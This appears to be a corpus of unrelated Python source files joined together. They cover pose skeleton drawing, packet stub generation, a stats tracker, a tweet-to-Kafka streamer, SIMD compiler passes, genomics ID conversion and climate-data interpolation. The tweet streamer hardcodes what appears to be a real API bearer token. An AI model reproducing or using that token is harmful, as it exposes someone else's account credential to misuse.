'fork',
'knife',
'spoon',
'bowl',
'banana',
'apple',
'sandwich',
'orange',
'broccoli',
'carrot',
'hot dog',
'pizza',
'donut',
'cake',
'chair',
'couch',
'potted plant',
'bed',
'mirror',
'dining table',
'window',
'desk',
'toilet',
'door',
'tv',
'laptop',
'mouse',
'remote',
'keyboard',
'cell phone',
'microwave',
'oven',
'toaster',
'sink',
'refrigerator',
'blender',
'book',
'clock',
'vase',
'scissors',
'teddy bear',
'hair drier',
'toothbrush',
'hair brush',
]
def draw_skeletons(pose):
import openpifpaf # pylint: disable=import-outside-toplevel
openpifpaf.show.KeypointPainter.show_joint_scales = True
keypoint_painter = openpifpaf.show.KeypointPainter()
scale = np.sqrt(
(np.max(pose[:, 0]) - np.min(pose[:, 0]))
* (np.max(pose[:, 1]) - np.min(pose[:, 1]))
)
ann = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=COCO_PERSON_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann, filename='docs/skeleton_coco.png') as ax:
keypoint_painter.annotation(ax, ann)
ann_kin = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=KINEMATIC_TREE_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann_kin.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann_kin, filename='docs/skeleton_kinematic_tree.png') as ax:
keypoint_painter.annotation(ax, ann_kin)
ann_dense = openpifpaf.Annotation(keypoints=COCO_KEYPOINTS,
skeleton=DENSER_COCO_PERSON_SKELETON,
score_weights=COCO_PERSON_SCORE_WEIGHTS)
ann_dense.set(pose, np.array(COCO_PERSON_SIGMAS) * scale)
with openpifpaf.show.Canvas.annotation(
ann, ann_bg=ann_dense, filename='docs/skeleton_dense.png') as ax:
keypoint_painter.annotation(ax, ann_dense)
def print_associations():
for j1, j2 in COCO_PERSON_SKELETON:
print(COCO_KEYPOINTS[j1 - 1], '-', COCO_KEYPOINTS[j2 - 1])
if __name__ == '__main__':
print_associations()
# c, s = np.cos(np.radians(45)), np.sin(np.radians(45))
# rotate = np.array(((c, -s), (s, c)))
# rotated_pose = np.copy(COCO_DAVINCI_POSE)
# rotated_pose[:, :2] = np.einsum('ij,kj->ki', rotate, rotated_pose[:, :2])
draw_skeletons(COCO_UPRIGHT_POSE)
|
buf = """const LOGIN_PACKET = 0x8f;
const PLAY_STATUS_PACKET = 0x90;
const DISCONNECT_PACKET = 0x91;
const BATCH_PACKET = 0x92;
const TEXT_PACKET = 0x93;
const SET_TIME_PACKET = 0x94;
const START_GAME_PACKET = 0x95;
const ADD_PLAYER_PACKET = 0x96;
const REMOVE_PLAYER_PACKET = 0x97;
const ADD_ENTITY_PACKET = 0x98;
const REMOVE_ENTITY_PACKET = 0x99;
const ADD_ITEM_ENTITY_PACKET = 0x9a;
const TAKE_ITEM_ENTITY_PACKET = 0x9b;
const MOVE_ENTITY_PACKET = 0x9c;
const MOVE_PLAYER_PACKET = 0x9d;
const REMOVE_BLOCK_PACKET = 0x9e;
const UPDATE_BLOCK_PACKET = 0x9f;
const ADD_PAINTING_PACKET = 0xa0;
const EXPLODE_PACKET = 0xa1;
const LEVEL_EVENT_PACKET = 0xa2;
const TILE_EVENT_PACKET = 0xa3;
const ENTITY_EVENT_PACKET = 0xa4;
const MOB_EFFECT_PACKET = 0xa5;
const UPDATE_ATTRIBUTES_PACKET = 0xa6;
const MOB_EQUIPMENT_PACKET = 0xa7;
const MOB_ARMOR_EQUIPMENT_PACKET = 0xa8;
const INTERACT_PACKET = 0xa9;
const USE_ITEM_PACKET = 0xaa;
const PLAYER_ACTION_PACKET = 0xab;
const HURT_ARMOR_PACKET = 0xac;
const SET_ENTITY_DATA_PACKET = 0xad;
const SET_ENTITY_MOTION_PACKET = 0xae;
const SET_ENTITY_LINK_PACKET = 0xaf;
const SET_HEALTH_PACKET = 0xb0;
const SET_SPAWN_POSITION_PACKET = 0xb1;
const ANIMATE_PACKET = 0xb2;
const RESPAWN_PACKET = 0xb3;
const DROP_ITEM_PACKET = 0xb4;
const CONTAINER_OPEN_PACKET = 0xb5;
const CONTAINER_CLOSE_PACKET = 0xb6;
const CONTAINER_SET_SLOT_PACKET = 0xb7;
const CONTAINER_SET_DATA_PACKET = 0xb8;
const CONTAINER_SET_CONTENT_PACKET = 0xb9;
const CRAFTING_DATA_PACKET = 0xba;
const CRAFTING_EVENT_PACKET = 0xbb;
const ADVENTURE_SETTINGS_PACKET = 0xbc;
const TILE_ENTITY_DATA_PACKET = 0xbd;
//const PLAYER_INPUT_PACKET = 0xbe;
const FULL_CHUNK_DATA_PACKET = 0xbf;
const SET_DIFFICULTY_PACKET = 0xc0;
//const CHANGE_DIMENSION_PACKET = 0xc1;
//const SET_PLAYER_GAMETYPE_PACKET = 0xc2;
const PLAYER_LIST_PACKET = 0xc3;
//const TELEMETRY_EVENT_PACKET = 0xc4;"""
fbuf = """package mcpe
import "bytes"
//%s is a packet implements <TODO>
type %s struct {
*bytes.Buffer
fields map[string]interface{}
}
//Encode encodes the packet
func (pk %s) Encode() error {
return nil
}
//Decode decodes the packet
func (pk %s) Decode() error {
return nil
}
//GetField returns specified field
func (pk %s) GetField(string) interface{} {
return nil
}
//SetField sets specified field
func (pk %s) SetField(string) interface{} {
return nil
}
"""
print("const (")
ss = ""
for line in buf.split("\n"):
line = line.replace("const ", "").replace(" ", "")
line = line.replace("//", "").replace(";", "")
offset = line.find(" = ")
const = ''.join(s[0] + s[1:].lower() for s in line[:offset].split("_"))
line = const + "Head" + line[offset:]
print(" //%sHead is a header constant for %s\n "%(const, const) + line)
with open(const[:len(const) - 6].lower() + ".go", "w") as f:
f.write(fbuf % (const, const, const, const, const, const))
ss += " registerPacket(%sHead, *new(%s))\n" % (const, const)
print(")")
print(" ------------ ")
print(ss)
|
pass
#testing 11/12/19
#testing 7/19/20
|
#!/usr/bin/env python3
# Automate the following for floating point values:
# Checking that the values are within the specified range (ValueError)
# Track the minimum, maximum, and average values found
# Usage as a tracker, store value elsewhere:
# my_stats_tracker_variable_x = StatsTrackerBase.create_instance(min_bds, max_bds)
# my_stats_tracker_variable_x.set_value( ... ) for setting the value
# my_stats_tracker_variable_x.value for getting the value back
#
# See Code Design: Core functionality of simulator
# https://docs.google.com/document/d/1n8lx0HtgjiIuXMuVhB-bQtbvZuE114Cetnb8XVvn0yM/edit?usp=sharing
#
class StatsTrackerBase:
def __init__(self, allowable_min, allowable_max):
""" Dimension sizes will be found in allowable min/max - they should match
@param allowable_min - single number
@param allowable_max - single number"""
self.allowable_min = allowable_min
self.allowable_max = allowable_max
self.value = None
# Do it this way because we'll override in reset
self.min_found = None
self.max_found = None
self.avg_found = None
self.count = 0
# override reset for the different data types
self.reset()
def __str__(self):
return self.get_name() + \
" Min: {0:0.2f}".format(self.min_found) + \
" Max: {0:0.2f}".format(self.max_found) + \
" Avg: {0:0.2f}".format(self.avg_found) + \
" N: {}".format(self.count)
def __repr__(self):
return self.__str__()
def reset(self):
""" Reset for floats/arrays. Should probably be NaN, but avoids having to check for min/max being set
@param can optionally set the value"""
if self.allowable_max < self.allowable_min:
raise ValueError("{0} max less than min".format(self))
self.min_found = self.allowable_max * 1e6
self.max_found = self.allowable_min * 1e-6
self.avg_found = self.allowable_min * 0.0
self.count = 0
self.value = None
def get_name(self):
""" This should be over-written by whatever class is inheriting from this one"""
return "{0}: ".format(self.__class__.__name__)
def set_value(self, val):
"""Wherever there's an equal/data, use this. It will check for allowable values and update the stats"""
if val < self.allowable_min:
raise ValueError("{0}, {1} less than min value {2}".format(self.get_name(), val, self.min_found))
if val > self.allowable_max:
raise ValueError("{0}, {1} greater than max value {2}".format(self.get_name(), val, self.max_found))
self.min_found = min(self.min_found, val)
self.max_found = max(self.max_found, val)
n = self.count+1
self.avg_found = self.avg_found * (self.count / n) + val * (1.0 / n)
self.count = n
self.value = val
@staticmethod
def create_instance(min_bds, max_bds, debug=True):
""" Create an instance based on the type (float/int or array)
TODO Be able to pass in the get_name method so you can name the variable
@param min_bds is either a number or an array
@param max_bds should match dimensionality of min_bds
@returns An instance of StatsTrackerBase (floats/ints) or StatsTrackerArray(array, numpy array) or DoNothing (debug = false"""
if not debug:
return StatsTrackerDoNothing()
try:
return StatsTrackerBase(min_bds, max_bds)
except:
return StatsTrackerArray(min_bds, max_bds)
class StatsTrackerArray(StatsTrackerBase):
""" Overrides just the methods that need to do array accesses"""
def __init__(self, allowable_min, allowable_max):
""" Dimension sizes will be found in allowable min/max - they should match
@param allowable_min - array
@param allowable_max - array"""
# Will call reset() and set the _found variables to be the right size
super(StatsTrackerArray, self).__init__(allowable_min, allowable_max)
def __str__(self):
return self.get_name() + \
" Min: [" + ",".join(["{0:0.2f}".format(v) for v in self.min_found]) + "]" + \
" Max: [" + ",".join(["{0:0.2f}".format(v) for v in self.max_found]) + "]" + \
" Avg: [" + ",".join(["{0:0.2f}".format(v) for v in self.avg_found]) + "]" + \
" N: {}".format(self.count)
def reset(self):
""" Have to set all of the elements in the array - indirectly checks that the arrays are same size"""
for min_v, max_v in zip(self.allowable_min, self.allowable_max):
if max_v < min_v:
raise ValueError("{0} max less than min".format(self))
self.min_found = [v * 1e6 for v in self.allowable_max]
self.max_found = [v * 1e-6 for v in self.allowable_min]
self.avg_found = [0 for _ in self.allowable_max]
self.count = 0
def set_value(self, val):
"""Wherever there's an equal/data, use this. It will check for allowable values and update the stats"""
for i, v in enumerate(val):
if v < self.allowable_min[i]:
raise ValueError("{0}, {1} less than min value {2}, index {3}".format(self.get_name(), val, self.min_found, i))
if v > self.allowable_max[i]:
raise ValueError("{0}, {1} greater than max value {2}, index {3}".format(self.get_name(), val, self.max_found, i))
self.min_found[i] = min(self.min_found[i], v)
self.max_found[i] = max(self.max_found[i], v)
n = self.count+1
self.avg_found[i] = self.avg_found[i] * (self.count / n) + v * (1.0 / n)
self.count += 1
self.value = val
class StatsTrackerDoNothing(StatsTrackerBase):
def __init__(self, *args):
self.value = None
pass
def reset(self):
pass
def __str__(self):
return self.get_name()
def set_value(self, val):
"""Just keep the value"""
self.value = val
if __name__ == "__main__":
my_test_float = StatsTrackerBase(3, 4)
my_test_array = StatsTrackerArray([3, 4, 5], [4, 10, 12])
print("{0}".format(my_test_float))
print("{0}".format(my_test_array))
|
# Imported required libraries
from tweepy import StreamingClient, StreamRule
from kafka import KafkaProducer
from jsons import dumps
#streamlit
# Creating reading class
class CustomInStream(StreamingClient):
def __init__(self, bearer_token, kafka_topic):
super(CustomInStream, self).__init__(bearer_token=bearer_token)
self.producer = KafkaProducer(bootstrap_servers=kafka_server, value_serializer=lambda m: dumps(m).encode('utf-8'))
self.kafka_topic = kafka_topic
def on_tweet(self, tweet):
# Please note that tweepy returns an object that needs to be serialized (i.e. converted to string)
# It must be encoded using utf-8 to handle non-ascii characters
print(tweet.id)
self.producer.send(self.kafka_topic, value=tweet)
#print(tweet.text)
#print(tweet.created_at)
#print(tweet.lang)
def recompile_rules(streaming_client):
# Getting Previous Rules ID's
prev_rules = streaming_client.get_rules()
rules_ids = []
for prev_rule in prev_rules[0]:
rules_ids.append(prev_rule.id)
# Deleting previous rules
streaming_client.delete_rules( ids=rules_ids )
# Creating filtering rules
ruleTag = "my-rule-1"
ruleValue = ""
ruleValue += "("
ruleValue += "covid"
ruleValue += " -is:retweet"
ruleValue += " -is:reply"
ruleValue += " -is:quote"
ruleValue += " -has:media"
ruleValue += " lang:en"
ruleValue += ")"
ruleValue += " OR ("
ruleValue += "covid"
ruleValue += " -is:retweet"
ruleValue += " -is:reply"
ruleValue += " -is:quote"
ruleValue += " -has:media"
ruleValue += " lang:fr"
ruleValue += ")"
# Adding new rules
rule1 = StreamRule(value=ruleValue, tag=ruleTag)
streaming_client.add_rules(rule1, dry_run=False)
######################################## BEGIN MAIN FUNCTION ########################################
# Tweepy Setup
bearer_token = "AAAAAAAAAAAAAAAAAAAAAORIaAEAAAAAl6GnXS7YGOeQdYa0uGwc8DMF40Q%3DLIM7DC8lSNbFmsVsgWYyJqYrl2iBCSsR3Z1uUqjJR8c2kONAG4"
reset_filtering_rules = False
# Kafka Configuration
kafka_server = ""
kafka_server += "localhost"
kafka_server += ":9092"
kafka_topic = "mes-tweets"
# Creating streaming client and authenticating using bearer token
streaming_client = CustomInStream(bearer_token=bearer_token, kafka_topic=kafka_topic)
# Recompiling client rules, if needed
if (reset_filtering_rules):
recompile_rules(streaming_client)
# Adding custom fields
tweet_fields = []
tweet_fields.append("created_at")
tweet_fields.append("lang")
expansions = []
expansions.append("referenced_tweets.id")
expansions.append("author_id")
# To test without rules or custom fields
# streaming_client.sample()
# Start reading
streaming_client.filter(tweet_fields=tweet_fields, expansions=expansions)
######################################## END MAIN FUNCTION ########################################
|
# file: tests/file_access_wrappers.py
# author: Andrew Jarcho
# date: 2017-01-22
# python: 3.5 pytest: 3.0.7
import io
class FileReadAccessWrapper:
def __init__(self, filename):
self.filename = filename
def open(self):
return open(self.filename, 'r')
class FakeFileReadWrapper:
def __init__(self, text):
self.text = text
self.start_ix = 0
def open(self):
return io.StringIO(self.text)
def input(self):
return self.open()
def __iter__(self): # TODO: not in use -- needs testing
return self
def __next__(self): # TODO: not in use -- needs testing
next_newline_ix = self.text.find('\n', self.start_ix)
if next_newline_ix == -1:
raise StopIteration
else:
ret_str = self.text[self.start_ix: next_newline_ix]
self.start_ix = next_newline_ix + 1
return ret_str
|
"""
Xtract Blueprint
"""
from calm.dsl.builtins import ref, basic_cred
from calm.dsl.builtins import Service, Package, Substrate
from calm.dsl.builtins import Deployment, Profile, Blueprint
from calm.dsl.builtins import read_provider_spec, read_local_file
ADMIN_PASSWD = read_local_file("admin_passwd")
DefaultCred = basic_cred("admin", ADMIN_PASSWD, name="default cred", default=True)
class XtractVM(Service):
"""Xtract service"""
pass
class XtractPackage(Package):
"""Xtract package"""
services = [ref(XtractVM)]
class XtractVMS(Substrate):
"""Xtract Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
readiness_probe = {
"disabled": True,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(DefaultCred),
}
class XtractDeployment(Deployment):
"""Xtract Deployment"""
packages = [ref(XtractPackage)]
substrate = ref(XtractVMS)
class AHV(Profile):
"""Xtract Profile"""
deployments = [XtractDeployment]
class XtractDslBlueprint(Blueprint):
"""* [Xtract for VMs](https://@@{XtractVM.address}@@)"""
credentials = [DefaultCred]
services = [XtractVM]
packages = [XtractPackage]
substrates = [XtractVMS]
profiles = [AHV]
def main():
print(XtractDslBlueprint.json_dumps(pprint=True))
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
import os,sys
import re
import shutil
import pypsutils
import subprocess
import pyps
simd_h = "SIMD_types.h"
def gen_simd_zeros(code):
""" This function will match the pattern SIMD_ZERO*_* + SIMD_LOAD_*
and replaces it by the real corresponding SIMD_ZERO function. """
pattern=r'(SIMD_LOAD_V([4 8])SF\(vec(.*), &(RED[0-9]+)\[0\]\);)'
compiled_pattern = re.compile(pattern)
occurences = re.findall(compiled_pattern,code)
if occurences != []:
for item in occurences:
code = re.sub(item[3]+"\[[0-"+item[1]+"]\] = (.*);\n","",code)
code = re.sub(re.escape(item[0]),"SIMD_ZERO_V"+item[1]+"SF(vec"+item[2]+");",code)
return code
def autotile(m,verb):
''' Function that autotile a module's loops '''
#m.rice_all_dependence()
#m.internalize_parallel_code()
#m.nest_parallelization()
#m.internalize_parallel_code()
m.split_update_operator()
def tile_or_dive(m,loops):
kernels=list()
for l in loops:
if l.loops():
try:
l.simdizer_auto_tile()
kernels.append(l)
except:
kernels+=tile_or_dive(m,l.loops())
else:
kernels.append(l)
return kernels
kernels=tile_or_dive(m,m.loops())
m.partial_eval()
extram=list()
for l in kernels:
mn=m.name+"_"+l.label
m.outline(module_name=mn,label=l.label)
lm=m.workspace[mn]
extram.append(lm)
if lm.loops() and lm.loops()[0].loops():
lm.loop_nest_unswitching()
if verb:
lm.display()
lm.suppress_dead_code()
if verb:
lm.display()
lm.loop_normalize(one_increment=True,skip_index_side_effect=True)
lm.partial_eval()
lm.partial_eval()
lm.partial_eval()
lm.flatten_code()
if verb:
lm.display()
else:
lm.loops()[0].loop_auto_unroll()
if verb:
m.display()
extram.append(m)
return extram
class sacbase(object):
@staticmethod
def sac(module, **cond):
ws = module.workspace
if not cond.has_key("verbose"):
cond["verbose"] = ws.verbose
# Here are the transformations made by benchmark.tpips.h, blindy
# translated in pyps.
ws.activate("preconditions_intra")
ws.activate("transformers_intra_full")
ws.props.loop_unroll_with_prologue = False
ws.props.constant_path_effects = False
#ws.props.ricedg_statistics_all_arrays = True
ws.props.c89_code_generation = True
ws.props.simd_fortran_mem_organisation = False
ws.props.sac_simd_register_width = cond["register_width"]
ws.props.prettyprint_all_declarations = True
ws.props.compute_all_dependences = True
module.recover_for_loop()
module.for_loop_to_do_loop()
module.split_initializations()
module.forward_substitute()
if cond.get("verbose"):
module.display()
module.split_update_operator()
if cond.get("if_conversion", False):
if cond.get("verbose"):
module.display()
module.if_conversion_init()
module.if_conversion()
module.if_conversion_compact()
if cond.get("verbose"):
module.display()
ws.activate("MUST_REGIONS")
ws.activate("REGION_CHAINS")
ws.activate("RICE_REGIONS_DEPENDENCE_GRAPH")
ws.activate("PRECONDITIONS_INTER_FULL")
ws.activate("TRANSFORMERS_INTER_FULL")
# Perform auto-loop tiling
allm=autotile(module,cond.get("verbose"))
for module in allm:
module.partial_eval()
module.simd_remove_reductions()
if cond.get("verbose"):
module.display()
for p in ( "__PIPS_SAC_MULADD" , ):
module.expression_substitution(pattern=p)
module.simd_atomizer()
if cond.get("verbose"):
module.display()
module.scalar_renaming()
try:
module.simdizer(generate_data_transfers=True)
except Exception,e:
print >>sys.stderr, "Module %s simdizer exeception:",str(e)
if cond.get("verbose"):
#module.print_dot_dependence_graph()
module.display()
module.redundant_load_store_elimination()
try:
module.delay_communications_intra()
module.flatten_code(unroll = False)
except RuntimeError: pass
module.redundant_load_store_elimination()
module.clean_declarations()
# In the end, uses the real SIMD_ZERO_* functions if necessary
# This would have been "perfect" (as much as perfect this
# method is...), but PIPS isn't aware of (a|v)4sf and
# other vector types...
#module.modify(gen_simd_zeros)
if cond.get("verbose"):
module.display()
class sacsse(sacbase):
register_width = 128
hfile = "sse.h"
makefile = "Makefile.sse"
ext = "sse"
@staticmethod
def sac(module, **kwargs):
kwargs["register_width"] = sacsse.register_width
sacbase.sac(module, **kwargs)
class sac3dnow(sacbase):
register_width = 64
hfile = "threednow.h"
makefile = "Makefile.3dn"
ext = "3dn"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sac3dnow.register_width
# 3dnow supports only floats
for line in module.code():
if re.search("double", line) or re.search(r"\b(cos|sin)\b", line):
raise RuntimeError("Can't vectorize double operations with 3DNow!")
sacbase.sac(module, *args, **kwargs)
class sacavx(sacbase):
register_width = 256
hfile = "avx.h"
makefile = "Makefile.avx"
ext = "avx"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sacavx.register_width
sacbase.sac(module, *args, **kwargs)
class sacneon(sacbase):
register_width = 128
hfile = "neon.h"
makefile = "Makefile.neon"
ext = "neon"
@staticmethod
def sac(module, *args, **kwargs):
kwargs["register_width"] = sacneon.register_width
sacbase.sac(module, *args, **kwargs)
class workspace(pyps.workspace):
"""The SAC subsystem, in Python.
Add a new transformation, for adapting code to SIMD instruction
sets (SSE, 3Dnow, AVX and ARM NEON)"""
patterns_h = "patterns.h"
patterns_c = "patterns.c"
simd_c = "SIMD.c"
def __init__(self, *sources, **kwargs):
drivers = {"sse": sacsse, "3dnow": sac3dnow, "avx": sacavx, "neon": sacneon}
self.driver = drivers[kwargs.get("driver", "sse")]
#Warning: this patches every modules, not only those of this workspace
pyps.module.sac=self.driver.sac
# Add -DRWBITS=self.driver.register_width to the cppflags of the workspace
kwargs['cppflags'] = kwargs.get('cppflags',"")+" -DRWBITS=%d " % (self.driver.register_width)
super(workspace,self).__init__(pypsutils.get_runtimefile(self.simd_c,"sac"), pypsutils.get_runtimefile(self.patterns_c,"sac"), *sources, **kwargs)
def save(self, rep=None):
"""Add $driver.h, which replaces general purpose SIMD instructions
with machine-specific ones."""
if rep == None:
rep = self.tmpdirname
(files,headers) = super(workspace,self).save(rep)
#run gen_simd_zeros on every file
for file in files:
with open(file, 'r') as f:
read_data = f.read()
read_data = gen_simd_zeros(read_data)
with open(file, 'w') as f:
f.write(read_data)
# Generate SIMD.h according to the register width
# thanks to gcc -E and cproto (ugly, need something
# better)
simd_h_fname = os.path.abspath(rep + "/SIMD.h")
simd_c_fname = os.path.abspath(rep + "/SIMD.c")
p = subprocess.Popen("gcc -DRWBITS=%d -E %s |cproto" % (self.driver.register_width, simd_c_fname), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(simd_cus_header,serr) = p.communicate()
if p.returncode != 0:
raise RuntimeError("Error while creating SIMD.h: command returned %d.\nstdout:\n%s\nstderr:\n%s\n" % (p.returncode, simd_cus_header, serr))
p = subprocess.Popen("gcc -DRWBITS=%d -E %s |cproto" % (self.driver.register_width, self.simd_c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(simdz_cus_header,serr) = p.communicate()
if p.returncode != 0:
raise RuntimeError("Error while creating SIMD.h: command returned %d.\nstdout:\n%s\nstderr:\n%s\n" % (p.returncode, simd_cus_header, serr))
pypsutils.string2file('#include "'+simd_h+'"\n'+simd_cus_header, simd_h_fname)
pypsutils.string2file(simd_h+"\n"+simdz_cus_header, simd_h_fname)
for fname in files:
if not fname.endswith("SIMD.c"):
pypsutils.addBeginnning(fname, '#include "'+simd_h+'"')
# Add the contents of patterns.h
for fname in files:
if not fname.endswith("patterns.c"):
pypsutils.addBeginnning(fname, '#include "'+self.patterns_h+'"\n')
# Add header to the save rep
shutil.copy(pypsutils.get_runtimefile(simd_h,"sac"),rep)
shutil.copy(pypsutils.get_runtimefile(self.patterns_h,"sac"),rep)
return files,headers+[os.path.join(rep,simd_h),os.path.join(rep,self.patterns_h)]
def get_sac_maker(self,Maker=pyps.Maker):
"""Calls sacMaker to return a maker class using the driver set in the workspace"""
return sacMaker(Maker,self.driver)
def sacMaker(Maker,driver):
"""Returns a maker class inheriting from the Maker class given in the arguments and using the driver given in the arguments"""
class C(Maker):
"""Maker class inheriting from Maker"""
def get_ext(self):
return "."+driver.ext+super(C,self).get_ext()
def get_makefile_info(self):
return [ ( "sac", driver.makefile ) ] + super(C,self).get_makefile_info()
def generate(self,path,sources,cppflags="",ldflags=""):
newsources = []
for fname in sources:
#change the includes
filestring = pypsutils.file2string(os.path.join(path,fname))
filestring= re.sub('#include "'+simd_h+'"','#include "'+driver.hfile+'"',filestring)
newcfile = "sac_"+fname
pypsutils.string2file(filestring,os.path.join(path,newcfile))
newsources.append(newcfile)
#create symlink .h file
hpath = os.path.join(path,driver.hfile)
if not os.path.exists(hpath):
shutil.copy(pypsutils.get_runtimefile(driver.hfile,"sac"),hpath)
makefile,others = super(C,self).generate(path,newsources,cppflags,ldflags)
return makefile,others+newsources+[driver.hfile]
return C
|
from tornado.web import url
from . import views
patterns = [
url(r'^/$', views.IndexView, name='index')
]
|
import json
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from eth_utils import to_bytes, to_hex
from raiden.utils import sha3
# The code below simulates XUD resolver functionality.
# It should only be used for testing and should not be used in
# run time or production.
def resolve(request):
preimage = None
x_secret = "0x2ff886d47b156de00d4cad5d8c332706692b5b572adfe35e6d2f65e92906806e"
x_secret_hash = to_hex(sha3(to_bytes(hexstr=x_secret)))
if request["secret_hash"] == x_secret_hash:
preimage = {"secret": x_secret}
return preimage
def serve():
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
try:
content_len = int(self.headers.get("Content-Length"))
body = self.rfile.read(content_len)
preimage = resolve(json.loads(body.decode("utf8")))
if preimage is None:
self.send_response(404)
self.end_headers()
else:
response = to_bytes(text=json.dumps(preimage))
self.send_response(200)
self.end_headers()
self.wfile.write(response)
except BaseException:
self.send_response(400)
self.end_headers()
httpd = HTTPServer(("localhost", 8000), SimpleHTTPRequestHandler)
httpd.serve_forever()
if __name__ == "__main__":
logging.basicConfig()
serve()
|
from collections import defaultdict
import json
'''
Convert ensembl ids to entrez ids. Delete duplicated and invalid (NA) ones.
'''
with open('./data/entrez_ids_original_HI-II-14.txt') as f:
ids = defaultdict(list)
for line in f.readlines():
num, ensembl, entrez = line[:-1].split()
ids[ensembl].append(entrez)
keys = list(ids.keys())
for k in keys:
if 'NA' in ids[k]:
del ids[k]
keys = sorted(list(ids.keys()))
ent = []
for i in range(len(keys)):
# ent.append("\t".join([str(i), keys[i], ids[keys[i]][0]]))
ent.append(ids[keys[i]][0])
with open('./data/entrez_ids_HI-II-14.txt', 'w') as f: # 该文件中无重复
f.write("\n".join(ent))
with open('./data/ensembl-entrez_HI-II-14.json','w') as f: # 该文件中包含重复,extract时会进行处理
json.dump(ids, f)
'''
# 确认无重复
for k in ids:
if len(set(ids[k])) != len(ids[k]):
print(k)
'''
'''
# 找有多个entrez id 的 ensembl id
for k in ids:
if len(ids[k])>1:
print(k, len(ids[k]))
# 结果
ENSG00000076928 2
ENSG00000105793 2
ENSG00000120341 2
ENSG00000120709 2
ENSG00000124713 2
ENSG00000137843 2
ENSG00000137936 2
ENSG00000143702 2
ENSG00000145979 2
ENSG00000146112 2
ENSG00000158301 2
ENSG00000158747 2
ENSG00000163156 2
ENSG00000166272 2
ENSG00000178882 2
ENSG00000181135 2
ENSG00000188629 2
ENSG00000196605 2
ENSG00000204209 2
ENSG00000205571 2
ENSG00000214026 2
ENSG00000215269 5
ENSG00000224659 2
ENSG00000236362 7
ENSG00000268606 2
ENSG00000276070 2
'''
'''
# 找无entrez id 的 ensembl id
for k in ids:
if 'NA' in ids[k]:
print(k, ids[k])
# 结果
ENSG00000064489 ['NA']
ENSG00000158483 ['NA']
ENSG00000171570 ['NA']
ENSG00000183889 ['NA']
ENSG00000213204 ['NA']
ENSG00000233024 ['NA']
ENSG00000255104 ['NA']
ENSG00000257390 ['NA']
ENSG00000259288 ['NA']
ENSG00000259529 ['NA']
ENSG00000268173 ['NA']
ENSG00000268500 ['NA']
ENSG00000270136 ['NA']
ENSG00000272617 ['NA']
ENSG00000284341 ['NA']
'''
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup, Extension
# define the extension module
cos_module = Extension('cos_module', sources=['cos_module.c'])
# run the setup
setup(ext_modules=[cos_module])
|
"""
Wrapper interface for dispatching calculations of auxiliary variables to the
correct functions depending on the data source a given dataset originated from.
"""
import xarray as xr
class MissingDomainData(Exception):
pass
from .era5.interpolation import interpolate_to_height_levels as era5_hl_interp
from .era5.interpolation import interpolate_to_pressure_levels as era5_pl_interp
from .era5.aux_variables import calc_variable as era5_calc
def calc_auxiliary_variable(ds, v, **kwargs):
"""
Given the dataset `ds` calculate the auxiliary variable `v`
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
raise Exception(
"Please define an attribute `data_source` on your domain data dataset"
" so that the correct method for calculating auxiliary variables can"
" be used (e.g. `ds.attrs['data_source'] = 'era5')`"
)
if data_source == "era5":
return era5_calc(ds=ds, var=v, **kwargs)
else:
raise NotImplementedError(
f"No method to calculate `{v}` for `{data_source}` has been implemented"
)
def interpolate_to_height_levels(ds, height):
"""
Some source data will not be define on "height levels" (i.e. the vertical
coordinate represents values at the same height in meters), but instead
might use a hybrid or pressure grid. This function calls the relevant
interpolation routines to ensure the domain data exists on height levels.
`height` is assumed to be in meters
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
raise Exception(
"Please define an attribute `data_source` on your domain data dataset"
" so that the correct method for transforming to height levels can"
" be used (e.g. `ds.attrs['data_source'] = 'era5')`"
)
if data_source == "era5":
ds_hl = era5_hl_interp(ds_model_levels=ds, height=height)
else:
raise NotImplementedError(
f"No method to inpolate domain data to height levels for"
" `{data_source}` has been implemented"
)
ds_hl.attrs["data_source"] = ds.attrs.get("data_source")
# test to ensure that correct coords with attrs has been set
if isinstance(height, xr.DataArray):
ds_hl["level"] = height
return ds_hl
def interpolate_to_pressure_levels(ds, pressure):
"""
Some source data will not be define on "pressure levels" (i.e. the vertical
coordinate represents values at the same height in meters), but instead
might use a hybrid or pressure grid. This function calls the relevant
interpolation routines to ensure the domain data exists on height levels.
`height` is assumed to be in meters
"""
data_source = ds.attrs.get("data_source")
if data_source is None:
raise Exception(
"Please define an attribute `data_source` on your domain data dataset"
" so that the correct method for transforming to height levels can"
" be used (e.g. `ds.attrs['data_source'] = 'era5')`"
)
if data_source == "era5":
ds_pl = era5_pl_interp(ds_model_levels=ds, pressure=pressure)
else:
raise NotImplementedError(
f"No method to inpolate domain data to height levels for"
" `{data_source}` has been implemented"
)
ds_pl.attrs["data_source"] = ds.attrs.get("data_source")
# test to ensure that correct coords with attrs has been set
if isinstance(pressure, xr.DataArray):
ds_pl["level"] = pressure
return ds_pl
|
#!/usr/bin/env python
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
